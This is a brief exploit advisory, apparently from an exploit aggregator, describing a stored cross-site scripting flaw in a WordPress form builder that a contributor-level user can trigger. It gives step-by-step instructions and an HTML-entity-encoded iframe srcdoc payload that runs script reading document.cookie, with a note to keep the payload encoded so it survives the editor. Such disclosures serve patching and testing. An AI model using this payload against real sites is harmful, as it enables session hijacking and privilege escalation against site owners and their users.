Share 
## https://sploitus.com/exploit?id=WPEX-ID:078F33CD-0F5C-46FE-B858-2107A09C6B69
As a contributor, create a blank form and add custom html field with the following content in the "Text" tab of the field editor:

<p>Some description about this section</p><p><iframe srcdoc="&#x3C;script&#x3E;alert(document.cookie)&#x3C;/script&#x3E;"></iframe></p>

Do not decode the payload. And please ensure that payload is added when editor has Text tab selected. Save the form, it will trigger xss payload.